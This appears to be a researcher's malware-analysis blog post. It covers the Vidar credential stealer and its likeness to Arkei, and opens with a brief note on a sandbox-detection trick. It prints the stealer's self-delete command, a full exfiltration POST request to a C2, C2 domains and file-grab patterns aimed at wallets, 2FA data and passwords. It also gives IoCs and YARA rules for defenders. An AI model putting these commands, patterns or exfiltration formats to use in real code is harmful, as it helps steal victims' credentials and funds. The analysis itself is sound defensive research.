Hi Folks,

I’m not usually in this kind of paper, but this time, I am exceptionally writing a really short one about something related to some VM evasive PoC.

There is always some tricks to detect if you are running on a virtual machine or not. Most of them are stupid, but it’s enough accurate to just lose some minds when you have to harden your sandbox.

The idea here, there are some sensors to check the current CPU Power Usage. When you see as below, it returns this kind of values, when you are running a program normally.

But in a sandbox, it will return 0.

Source: >>> Crappy ugly content <<<

#HappyHunting

Photo by Shawn Stutzman from Pexels

 

 

 

Sometimes when you are reading tons and tons of log of malware analysis, you are not expecting that some little changes could be in fact impactful.

I paid the price when I was analyzing a supposed Arkei malware. my Yara rule at that time was supposed to trigger this malware, but after some reversing, I realized that I was confronted with something different. Some strings linked to Arkei signature was deleted and a new one appeared with the string “Vidar”, there are also some other tweaks in the in-depth analysis that proves there are some differences (but small), but all the rest was totally identical to Arkei.

The malware is written in C++, seems to have started activities at the beginning of October 2018 and have all the kind of classic features of stealers:

• Searching for specific documents
• Stealing ID from cookie browsers
• Stealing browser histories (also from tor browser)
• Stealing wallets
• Stealing data from 2FA software
• Grabbing message from messenger software
• Screenshot
• Loader settings
• Telegram notifications (on server-side)
• Get a complete snapshot of all information of the computer victim

Sold with a range of 250-700$, this stealer on shop/forums and when people buy it, they have access to a C2 Shop portal where they are able to generate their own payloads. So there is no management on their side. Also, domains who leads to the C2/Shop are changed every 4 days.

For this in-depth analysis, I will inspect the 4.1 version of Vidar, take an overview of the admin panel, catching the differences with Arkei.

Basic Countries by-passing

So first of all, we have some classic pattern to quit the program if the victim machines are configured in some language with the help of GetUserDefaultLocaleName. This is one of the easy tricks to check if the malware is not infected users from specific countries.

As explained in the MSDN, A “locale” is a collection of language-related user preference information represented as a list of values, the stealer will check if the language is corresponding with the list of countries that mentioned below.

With a few seconds of searching on google, it’s easy to understand which countries are behind the locale names :

Locale	Country
ru-RU	Russia
be-BY	Belarus
uz-UZ	Uzbekistan
kk-KZ	Kazhakstan
az-AZ	Azerbaijan

LCID Structure – https://msdn.microsoft.com/en-us/library/cc233968.aspx
Language Code Table – http://www.lingoes.net/en/translator/langcode.htm
LocaleName – https://docs.microsoft.com/fr-fr/windows/desktop/Intl/locale-names
Locale – https://docs.microsoft.com/fr-fr/windows/desktop/Intl/locales-and-languages

Mutex generation

The mutant string generated by Vidar is unique for each victim, but simple to understand how it is generated. This is just a concatenation of two strings :

• Hardware Profile ID

GetCurrentHwProfileA is used to retrieve the current hardware profile of the computer with the value of szHwProfileGuid. If it fails, it will return “Unknown” here.

• The Machine GUID

With the help of RegOpenKeyExA, the value of the registry key  is fetched:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This is the UUID created by Windows during the installation of the operating system.

When it’s done, the mutex is created, just like this :

String setup

When Vidar is entering in the main function, it needs to store some required strings to be able to work properly for some further steps.

All the RVA address of each string are stored in the .data section. The malware will go there to access to the requested string.

This is a trick to slow down the static analysis of the malware, but this is really easy to surpass

C2 Domain & Profile ID

When the malware is generated by the builder on the customer area. A unique ID is hardcoded into it. When Vidar will request this value on the malicious domain, it will retrieve the corresponding profile that the threat actor wants to grab/steal into the victim machine.

So on this case, this the profile ID is “178”. If there is no config on the malware, the profile ID “1” is hardcoded into it.

The C2 domain is a simple XORed string, the key is directly put into the XOR function to decrypt the data.

And decrypted it’s in fact “newagenias.com”

Configs are possible to be extracted easily with the script izanami.py on my GitHub repository.

How to understand the config format

For example, this is default configuration the malware could get from the C2 :

1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;

Each part have the “;” in delimiter, so let’s dig into it

• First part

1	Saved password
1	Cookies / AutoFill
1	Wallet
1	Internet History
1	??? –  Supposed to be Skype (not implemented)
1	??? – Supposed to be Steam (not implemented)
1	Telegram
1	Screenshot
1	Grabber
1	???
250	Max Size (kb)
Default	Name of the profile (also used for archive file into the files repository)

• Second part

%DESKTOP %

Selected folder repository where the grabber feature will search recursively (or not) some selected data

• Third part

*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*

• Fourth part

50	Max Size per file (kb)
true	Collect Recursively

• Fifth part:

movies:music:mp3;

This is the exception part, the grabber will avoid those strings if it matches in the files searched recursively in the specific wanted folder.

The setup is quite a mess if we are looking into the code. each option is stored into a byte or dword variable.

Folder generation

To summarize all kind of possibles files/folders that will be generated for the malicious repository is in fact pretty simple :

\\files                   <- Master folder
\\files\\Autofill         <- Auto-Fill files
\\files\\CC               <- Credit Cards
\\files\\Cookies          <- Cookies
\\files\\Downloads        <- Downloaded data history from browsers
\\files\\Files            <- Profile configs (Archives)
\\files\\History          <- Browser histories
\\files\\Soft             <- Master folder for targeted softwares
\\files\\Soft\\Authy      <- 2FA software
\\files\\Telegram         <- Telegram messages
\\files\\Wallets          <- Cryptomining Wallets

Generalist files

\\files\screenshot.jpg     <- Actual screenshot of the screen
\\files\passwords.txt      <- Passwords consolidated all at once
\\files\\information.txt   <- Snapshot of the computer setup

Libraries necessary to grab some data

Something that I love when I read some malware specs, it’s when they said that the product could be launched without the necessity to have some runtime libraries or other required software on the machine. But when you dig into the code or just watching some network flow, you can see that the malware is downloading some DLL to be able to do some tasks.

And for this case, they are required during the stealing process of different kind of browsers.

freebl3.dll	Freebl Library for the NSS (Mozilla Browser)
mozglue.dll	Mozilla Browser Library
msvcp140.dll	Visual C++ Runtime 2015
nss3.dll	Network System Services Library (Mozilla Browser)
softokn3.dll	Mozilla Browser Library
vcruntime140.dll	Visual C++ Runtime 2015

They are deleted when the task is done.

FTP

List of supported software

• FileZilla
• WinSCP

2FA software

Something that I found interesting on this malware is that also 2FA software is also targeted, a feature that I considered not seen really in the wild, and pretty sure this will be more and more common in the future. With the multiplication of those kinds of protection. Victims must understand that 2FA is not the ultimate way to protect accounts from hackers, this could be also another door for vulnerabilities

So with Vidar, the Authy software is targeted…

More specifically the SQLite file on the corresponding application on %APPDATA% repository. It looks like this is the same operating where stealer wants to steal data with software like Discord or Chrome.

So guys, be careful with your 2FA software

Browsers

Something interesting to mention, this bad boy is also stealing Tor Browser stuff.

List of supported Browsers

• 360 Browser
• Amigo
• BlackHawk
• Cent Browser
• Chedot Browser
• Chromium
• CocCoc
• Comodo Dragon
• Cyberfox
• Elements Browser
• Epic Privacy
• Google Chrome
• IceCat
• Internet Explorer
• K-Meleon
• Kometa
• Maxthon5
• Microsoft Edge
• Mozilla Firefox
• Mustang Browser
• Nichrome
• Opera
• Orbitum
• Pale Moon
• QIP Surf
• QQ Browser
• Sputnik
• Suhba Browser
• Tor Browser
• Torch
• URAN
• Vivaldi
• Waterfox

Of course, this list could be more important than this if there are some browsers based on chromium repository.

Messengers/Mailer

I will not explain here, how it works, but the technique is the same that I’ve explained in my previous blog post. (Especially for the Telegram part).

• Bat!
• Pidgin
• Telegram
• Thunderbird

Wallets

• Anoncoin
• BBQCoin
• Bitcoin
• DashCore
• DevCoin
• DigitalCoin
• Electron Cash
• ElectrumLTC
• Ethereum
• Exodus
• FlorinCoin
• FrancoCoin
• JAXX
• Litecoin
• MultiDoge
• TerraCoin
• YACoin
• Zcash

Of course, this list could change if the customer added some additional files to search on specific areas on the victim machine.

Grabber

The grabber feature is by far, the most complicated feature of the malware and what he looks to be really different from Arkei, in term of implementation.

So first of all, it will skip or not the grabber feature by checking in config file downloaded, if this is activated. Preparing the strings for creating the folder path and when all is set func_grabber could be used.

When inspecting the func_grabber, I was not prepared to have this :

By far, when I saw this, I was not really happy to reverse this. I mean, I know I was falling in some unexpected allocated memory into my brain. I had all the magnificent stuff that all malware reverser love (or not at all) :

• Weird conditions come out the blue.
• Calling function that will call other functions like Russian wooden dolls
• API calls
• etc…

But if we are watching these at a macro view, it’s, in fact, easier than it looks like. I will just show just one example.

So in the example below, if the string %APPDATA% is present in the config downloaded from the C2. it will enter into the function and will start a bunch of verifications. Until entering into the most important one called func_VidarSearchFile

After the process will remain almost the same for each scenario.

This is at least, all the repositories available in the grabber feature :

• %ALL_DRIVES% (GetDriveTypeA Necessary)
• %APPDATA%
• %C%
• %D%
• %DESKTOP%
• %DOCUMENTS%
• %DRIVE_FIXED%
• %DRIVE_REMOVABLE%
• %LOCALAPPDATA%
• %USERPROFILE%

Screenshot

The generation of the screenshot is easy to understand :

• First GdiplusStartup function is called to initialize the Windows GDI+
• Then an alternative to GetDeviceCaps is called for getting the height of the screen on the display monitor with the value SM_CYSCREEN (1) with GetSystemMetrics this will be the same thing with SM_CXSCREEN (0) for the width.

• Now, it needs a DC object for creating a compatible bitmap necessary to generate our image by selecting the windows DC into the compatible memory DC and using a Bit Block API function to transfer the data. When all is done, it will enter into func_GdipSaveImageToFile

So now its needed to collect the bits from the generated bitmap and copies them into a buffer that will generate the screen capture file.

Information Log

So let’s dig into information.txt, to understand how this file is generated. I will mention only some parts of the creation, another part will be just the corresponded API call, breakpoint on these API if you want to take your time to analyze all the step easily.

First, it indicates which version of Vidar is used.

If you don’t see a Vidar on the log file. It means that you have an early version of it.

Date	GetSystemTimeAsFileTime
MachineID	Explained Above
GUID	GetCurrentHwProfileA
Path	GetModuleFileNameExA
Work Dir	Hardcoded string + func_FolderNameGeneration

Get the name of the operating system and platform is classic because this is, in fact, a concatenation of two things. First, with RegOpenKeyExA, the value of this registry key is fetched:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName

Secondly, for knowing if Windows is 32 or 64-bit, it checks itself if is running on WOW64 with the help of IsWow64Process.

Computer Name	GetComputerNameA
User Name	GetUserNameA

For the current screen resolution used, CreateDCA is called to create a device context for “Display” and requesting the Width and Height of the Device with GetDeviceCaps.

This remains to this source code :

HDC hDC = CreateDCA("DISPLAY", NULL, NULL, NULL);  
int width = GetDeviceCaps(hDC, HORZRES); // HORZRES = 0x8
int height = GetDeviceCaps(hDC, VERTRES); // VERTRES = 0x0A

Let’s continue our in-depth analysis…

Display Language	GetUserDefaultLocaleName
Keyboard Languages	GetKeyboardLayoutList / GetLocaleInfoA
Local Time	GetSystemTimeAsFileTime
TimeZone	TzSpecificLocalTimeToSystemTime

Hardware

??? the process name, the value of the registry key  is fetched:

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\ProcessorNameString

CPU Count	GetSystemInfo.dwNumberOfProcessors
RAM	GlobalMemoryStatusEx
VideoCard	EnumDisplayDevicesW

Network

The network part is quite easy, it’s a translation of data retrieves on ip-api.com/line/ and put into the log, at the corresponding place.

Processes

There is quite soft stuff done to get a snapshot of all the processes at the time where the stealer is executed.

But in the end, this is not complicated at all to understand the different steps.

• Request CreateToolhelp32Snapshot, to get the complete snapshot of all the processes executed, and read one per one in a loop all with Process32First

After, checking if it’s a parent process or a child process, Vidar will grab two value of the PROCESSENTRY32 object :

• th32ProcessID: PID
• szExeFile: The name of the PE

Software

For the list of all installed software, the value of this registry key is fetched:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

And these values are retrieves of each software.

• DisplayName
• DisplayVersion

Results

So for example, if you want to see the results, let’s see into one sandbox analysis, the generated information.txt (this is a Vidar 4.2 here)

Vidar Version: 4.2

Date: Thu Dec 13 14:39:05 2018
MachineID: 90059c37-1320-41a4-b58d-2b75a9850d2f
GUID: {e29ac6c0-7037-11de-816d-806e6f6e6963}

Path: C:\Users\admin\AppData\Local\Temp\toto.exe 
Work Dir: C:\ProgramData\LDGQ3MM434V3HGAR2ZUK

Windows: Windows 7 Professional [x86]
Computer Name: USER-PC
User Name: admin
Display Resolution: 1280x720
Display Language: en-US
Keyboard Languages: English (United States)
Local Time: 13/12/2018 14:39:5
TimeZone: UTC-0

[Hardware]
Processor: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
CPU Count: 4
RAM: 3583 MB
VideoCard: Standard VGA Graphics Adapter

[Network]
IP: 185.230.125.140
Country: Switzerland (CH)
City: Zurich (Zurich)
ZIP: 8010
Coordinates: 47.3769,8.54169
ISP: M247 Ltd (M247 Ltd)

[Processes]
- System [4]
---------- smss.exe [264]
- csrss.exe [344]
< ... >

[Software]
Adobe Flash Player 26 ActiveX [26.0.0.131]
Adobe Flash Player 26 NPAPI [26.0.0.131]
Adobe Flash Player 26 PPAPI [26.0.0.131]
< ... >

Loader

The task is rudimentary but enough to do the job :

• Generating a random name for the downloaded payload
• Download the payload
• Execute

When the binary file is downloaded from the C2, it’s using CreateFileA with specific parameters :

• edi : The downloaded data from the C2
• 80h : “The file does not have other attributes set. This attribute is valid only if used alone.”
• 2 : This option will force the overwriting if the filename already exists.
• edi : ???
• 1 : “Enables subsequent open operations on a file or device to request read access.”

  Otherwise, other processes cannot open the file or device if they request read access.”

• 40000000h : Write access (GENERIC_WRITE)
• ebp+lpFileName : The generated filename 

When it’s done, it only needs to Write content into the files (WriteFile) and then close the corresponding handle (CloseHandle)

So now, the file is downloaded and saved into the disk, it only needs to be launched with ShellExecuteA. So don’t hesitate to breakpoint this API function, for grabbing the payload before it’s too late for further analysis.

Killing Part

So when all the task of the stealer is finally accomplished and cleaned, the stealer needs to erase itself. So first of all, it retrieves this own PID with the help of GetCurrentProcessId.

When it’s done, it enters into “func_GetProcessIdName”, tries to open a handle on his own process with OpenProcess, if it failed, it continues to check and in the end the most important task here is to call GetModuleBaseNameA, which it permits to retrieve the name of the process name with the help of the PID that was obtained before.

Some strings that are hardcoded on .rdata section are called and saved for future purposes.

When the request is finely crafted, Vidar is simply using ShellExecuteA to pop a command shell and executing the task, this permit to erase all trace of the interaction of the payload on the machine.

So if we want a quick overview of the executed command:

C:\Windows\System32\cmd.exe” /c taskkill /im vidar.exe /f & erase C:\Users\Pouet\AppData\Local\Temp\vidar.exe & exit

Literally:

Offset File + db ‘/c taskkill /im’ + [GetModuleBaseNameA] + db ‘ /f & erase’  + [GetModuleFileNameExA + GetModuleBaseNameA]+  + db ‘ & exit’

Sending archive to the C2

Folder generation

COUNTRY + “_” + Machine GUID + “.zip”

in example :

NG_d6836847-acf3-4cee-945d-10c9982b53d1.zip

Last POST request

During the generation of the POST request, the generated HTTP packet is tweaked to add some additional content that the C2 server will read and process data.

Each name at the end of the string will be the corresponding field to be saved into the database. This at least, all the different Content-Disposition that will be added to the HTTP request.

hwid	Hardware ID
os	Operating System
platform	32 or 64 bits System
profile	C2 Profile ID
user	Name of the victim account
cccount	Number of Credit Cards stolen
ccount	Number of Coins Stolen (CryptoWallet)
fcount	Number of files stolen
telegram	Telegram
ver	The version of the Vidar malware

Also, there is a little trick here that I found nice. Here, the answer to the POST request is in fact, containing the config for the loader.

• If there is nothing, the response is “ok”
• If there is something, the specified url(s) are stored.

Its the same thing used for the config and the network information.

Example with a sandbox :

• The POST request

• The response of this POST request (select the tab)

Server-Side

Because it’s easy to find some information about the stealer, no needs to dig hard to have some marketplace where Vidar is sold. So let’s see how it looks like by looking some classical commercial video (all the screenshot are collected from there), for attracting some possible customers. This could be completely different at that time, but it’s what it was looking like at the beginning of November.

Login

Dashboard

The panel is a classical fancy user-friendly interface, with all the basic information necessary for the customer to have a fast view how is goin’ his business.

• The current version of the builder
• Until when he is able to generate some payloads
• How many victims
• The current balance on his account to re-subscribe again

Logs

something to mention with the log part is that it’s possible to put some notes on each data.

Passwords

Builder

The builder tab is also pretty interesting because we have the changelog information about the stealer and on the download part, the malware generated will not be packed and this is the same scenario with Arkei.

Customer/Threat actor must have to use his own crypter/packer software for his payload.

Settings

The most important tab is obviously where it is possible to configure the payload, for grabbing some additional stuff on the machine with the profiles. Activate or deactivate some features to filtering the stealer for really specific purposes.

It’s also important to notify, that it’s possible with Vidar to deploy multiple profiles at the same time. It means when the payload is infecting the victim machine, X archive for X profile is saved in “files” repository. The customer could be able to sort easily for malicious purposes after the grabbed data.

When editing or creating a new rule, we have this prompt panel appearing and this is in relation with what explained above with all possible path that the malware is able to search with the selected files.

After checking a little, there is plenty of profiles on the C2. This is what we could found:

Default empty config:

1,1,1,1,1,1,1,1,0,1,250,none;

Default initialized config:

1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;

Examples of custom profiles:

1,1,1,1,1,1,1,1,1,1,250,grabba;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;100;true;movies:music:mp3;
1,1,0,1,1,1,1,1,1,1,250,инфа;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;
1,1,1,1,1,1,1,1,1,1,250,Первое;%DESKTOP%\;*.txt:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*;50;true;movies:music:mp3;
1,1,1,1,1,1,1,1,1,1,250,123435566;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;
1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;

There are also some possibilities to see multiple profiles executed at the same time.

1,1,1,1,1,1,0,1,1,1,250,
DESKTOP;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*2fa*.png:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*:*seed*.*:*pass*.*:*btc*.*:*coin*.*:*poloniex*.*:*kraken*.*:*cex*.*:*okex*.*:*binance*.*:*bitfinex*.*:*bittrex*.*:*gdax*.*:*private*.*:*upbit*.*:*bithimb*.*:*hitbtc*.*:*bitflyer*.*:*kucoin*.*:*API*.*:*huobi*.*:*coinigy*.*:*jaxx*.*:*electrum*.*:*exodus*.*:*neo*.*:*yobit*.*:*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*crypt*.*:*key*.*:*seed*.*:*pass*.*:*btc*.*:*coin*.*:*poloniex*.*:*kraken*.*:*cex*.*;100;true;movies:music:mp3:dll;
DOCUMENTS;%DOCUMENTS%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*:*seed*.*:*pass*.*:*btc*.*:*coin*.*:*poloniex*.*:*kraken*.*:*cex*.*:*okex*.*:*binance*.*:*bitfinex*.*:*bittrex*.*:*gdax*.*:*private*.*:*upbit*.*:*bithimb*.*:*hitbtc*.*:*bitflyer*.*:*kucoin*.*:*API*.*:*huobi*.*:*coinigy*.*:*jaxx*.*:*electrum*.*:*exodus*.*:*neo*.*:*yobit*.*:*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*crypt*.*:*key*.*:*seed*.*:*pass*.*:*btc*.*:*coin*.*:*poloniex*.*:*kraken*.*:*cex*.*;100;true;movies:music:mp3:dll;
DRIVE_REMOVABLE;%DRIVE_REMOVABLE%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*:*seed*.*:*pass*.*:*btc*.*:*coin*.*:*poloniex*.*:*kraken*.*:*cex*.*:*okex*.*:*binance*.*:*bitfinex*.*:*bittrex*.*:*gdax*.*:*private*.*:*upbit*.*:*bithimb*.*:*hitbtc*.*:*bitflyer*.*:*kucoin*.*:*API*.*:*huobi*.*:*coinigy*.*:*jaxx*.*:*electrum*.*:*exodus*.*:*neo*.*:*yobit*.*:*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*crypt*.*:*key*.*:*seed*.*:*pass*.*:*btc*.*:*coin*.*:*poloniex*.*:*kraken*.*:*cex*.*;100;true;movies:music:mp3:dll;

they are in fact Delimited with the specific format, as detailed as above. So here, we have 3 profiles :

• DESKTOP
• DOCUMENTS
• DRIVE_REMOVABLE

that will be stored into there respectively archives into “files” repository.

e.d: All dumped profiles are available on my GitHub repository.

Finally, with this quick analysis of the panel, something that is more and more common nowadays with a stealer, a loader feature, for pushing other malware.

As mentioned in the introduction, this is a shop where customers will just have to deal to configure their malware, everything is managed by a team (?) behind for the maintenance and for avoiding proxy filtering stuff, domains are changed regularly (it’s also easy to check this on the samples, because it looks like a new version means a new generated domain).

Also, there is some possibility (of what they said) to have a 2FA Authentication to their account page.

Some fancy message

if we are searching for some stuff with the login panel, with have some sympathetic message.

Let’s see what we have behind

A kind of easter egg to remind us what is the signification of Vidar: “the God of Vengeance” in Nordic mythology.

Vidar – An Arkei copycat?

If we are looking to requests and code, Vidar is almost identical to Arkei. There is slightly some differences at some point but all implemented features are the same. This could lose some blue team people if they don’t make too much attention to it on sandbox results. Current Yara rules will trigger Vidar as Arkei, so automated assignations lead to mistakes at the moment of this review. Analyzing the code is mandatory here to understand what’s goin’ on.

At first, the main function for both of them is similar :

The archive generation is also the same, so this is not with this information that it’s possible to differentiate these two malware.

Code differences

An easy to know if we are dealing with Vidar is to find “Vidar.cpp”.

Vidar Signature

Arkei signature

Network differences

An analyst can be dupe easily with the requests and thinking that we have another form of HTTP requests with Arkei, but it’s not.

Vidar HTTP Requests

/ (i.e 162)    <- Config
ip-api.com/line/    <- Get Network Info
/msvcp140.dll       <- Required DLL
/nss3.dll           <- Required DLL
/softokn3.dll       <- Required DLL
/vcruntime140.dll   <- Required DLL
/                   <- Pushing Victim Archive to C2

there are no libraries downloaded on Arkei, this is something really specific to Vidar, for some parts of the stealing process.

Arkei HTTP Requests

/index.php        <- Config
ip-api.com/line/  <- Get Network Info
/index.php        <- Pushing Victim Archive to C2

Config Format

If you want to understand what is the purpose the config format for Arkei

1	Saved Passwords
1	Cookies / Autofill
1	History
2	CryptoCurrency
2	Skype
2	Steam
1	Telegram
1	Screenshot
1	Grabber
txt:log:	Grabber Config
50	Max Size (kb)
2	Self Delete

Also, there are some slight changes in the last POST requests, Vidar is just adding new fields like the profile and the versioning.

To understand how far the requests looks the same, let’s dig into a PCAP file. I indicated the differences in red, and apart from the versioning and profile values, all rest is the same. But if we dig into some older sample, it’s impossible to see the differences except the path of the request.

Last POST request – Vidar

POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 66809
Host: some.lovely.vidar.c2.with.love
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="hwid"

90059c37-1320-41a4-b58d-2b75a9850d2f
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="os"

Windows 7 Professional
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="platform"

x86
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="profile"

XXX <- Random Int
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="user"

admin
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="cccount"

0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ccount"

0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="fcount"

0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="telegram"

0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ver"

4.1
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="logs"; filename="COUNTRY_.zip"
Content-Type: zip

Features differences

When we dig into the different features, there is some config part on Vidar that is in fact just some placebo options. in an example, the Steam stealing feature is implemented in Arkei is not found in Vidar. This is also the same thing with Skype but in contrary 2FA stealing stuff is only on Vidar (with what I have seen on samples in my possession).

Is Arkei still active and maintained?

On one of the selling page of this stealer, it’s still sold and continue to be updated. For example, it reveals that soon a final update on it will be pushed (v10). So let’s see how this will turn.

The Vidar Cracked Version

There is also in the wild a cracked version that was already spotted by some people on twitter. This Vidar or “Anti-Vidar” as called in the source code of the panel and It’s based on an early Vidar build (v2.3 it seems).

Login

The login is identical to the Android Lokibot panel (thanks to @siri_urz). As always when confronted at this kind of stuff, the code never lies (or it seems) for helping us to identify what is the real C2/Malware.

Profile code

The profile is far more simple than the nowadays panels and samples, the default profile is hardcoded on the PHP file, and will get it if the value is 11.

IoCs

SHA256 Hashes

3A20466CC8C07638B8882CCC9B14C08F605F700F03D388CF85B2E76C51D64D65 0E982A02D754588D4EE99F30084B886B665FF04A1460D45C4FD410B04B10A8AF 2679FA8E9FD0C1F6F26527D53759BB596FDA43A741B4DFCC99A8C0907836A835 9EC586B07961E0C93C830DD1C47598FE21277432F11809A4B73DF7370CDD2E29 42C6950CA57D8805C217E3334158DAB4CC71A50C94D77F608B1C442BFD2B01CA D71F81EDF8AC04639D3B7C80AA178DF95C2CBFE73F81E931448A475FB771267A DAD5FCEAB002791DD6FD575782C173F1A39E0E7CE36E6DE1BAEFA95D0A8FB889 66162E69CA30A75E0DD1A6FBB9028FCFBE67B4ADE8E844E7C9FF2DCB46D993D8 EFF272B93FAA1C8C403EA579574F8675AB127C63ED21DB3900F8AB4FE4EC6DA9 EDBAC320C42DE77C184D30A69E119D27AE3CA7D368F802D2F8F1DA3B8D01D6DD B1D5B79D13F95A516ABBCC486841C8659984E5135F1D9C74343DCCD4390C3475 543AEE5A5435C77A8DE01433079F6381ADB4110F5EF4350E9A1A56B98FE40292 65B2BD17E452409397E2BD6F8E95FE8B708347D80074861698E4683BD12437A9 47E89F2C76D018D4952D421C5F1D603716B10E1712266DA32F63082F042F9C46 5D37323DA22C5414F6E03E06EFD184D7837D598C5E395E83C1BF248A7DE57155 5C0AF9C605AFD72BEF7CE8184BCCC9578EDB3A17498ACEBB74D02EB4AF0A6D2E 65287763245FDD8B56BB72298C78FEA62405BD35794A06AFBBE23CC5D38BE90A 20E92C2BF75C473B745617932F8DC0F8051BFC2F91BB938B2CC1CD808EBBC675 C752B68F3694B2FAAB117BCBA36C156514047B75151BBBFE62764C85CEF8ADE5 AE2EBF5B5813F92B0F7D6FCBADFA6E340646E4A776163AE86905E735A4B895A0 8F73E9C44C86D2BBADC545CED244F38472C5AACE0F75F57C8FC2398CE0A7F5A1

thx @benkow_ for the help to find some samples

Domains

malansio.com
nasalietco.com
binacoirel.com
newagenias.com
bokolavrstos.com
naicrose.com
benderio.com
cool3dmods.com

MITRE ATT&CK

• Discovery – System Information Discovery
• Discovery – System Time Discovery
• Discovery – Query Registry
• Discovery – Process Discovery
• Execution – Command-Line Interface
• Execution – Execution through Module Load
• Credential Access – Credentials in Files
• Collection – Screen Capture
• Collection – Data From Removable Media 
• Collection – Data from Local System
• Exfiltration – Data Compressed

 

Yara Rules

Vidar

rule Vidar_Stealer : Vidar 
{
    meta:
        description = "Yara rule for detecting Vidar stealer"
        author = "Fumik0_"

    strings:
        $mz = { 4D 5A }

        $s1 = { 56 69 64 61 72 }
        $s2 = { 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 }
    condition:
        $mz at 0 and ( (all of ($s*)) )
}

rule Vidar_Early : Vidar 
{
    meta:
        description = "Yara rule for detecting Vidar stealer - Early versions"
        author = "Fumik0_"

    strings:
        $mz = { 4D 5A }
        $s1 =  { 56 69 64 61 72 }
        $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }
    condition:
         $mz at 0 and all of ($hx*) and not $s1
}

rule AntiVidar : Vidar 
{
    meta:
        description = "Yara rule for detecting Anti Vidar - Vidar Cracked Version"
        author = "Fumik0_"

    strings:
        $mz = { 4D 5A }
        $s1 = { 56 69 64 61 72 }
        $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }
        $hx2 = { 78 61 6B 66 6F 72 2E 6E  65 74 00 }
    condition:
         $mz at 0 and all of ($hx*) and not $s1
}

Arkei

 rule Arkei : Arkei
rule Arkei : Arkei
{
     meta:
          Author = "Fumik0_"
          Description = "Rule to detect Arkei"
          Date = "2018/12/11"

      strings:
          $mz = { 4D 5A }

          $s1 = "Arkei" wide ascii
          $s2 = "/server/gate" wide ascii
          $s3 = "/server/grubConfig" wide ascii
          $s4 = "\\files\\" wide ascii
          $s5 = "SQLite" wide ascii

          $x1 = "/c taskkill /im" wide ascii
          $x2 = "screenshot.jpg" wide ascii
          $x3 = "files\\passwords.txt" wide ascii
          $x4 = "http://ip-api.com/line/" wide ascii
          $x5 = "[Hardware]" wide ascii
          $x6 = "[Network]" wide ascii
          $x7 = "[Processes]" wide ascii

          $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }


     condition:
          $mz at 0 and
          ( (all of ($s*)) or ((all of ($x*)) and not $hx1))
}

Github

• Extract Vidar Config
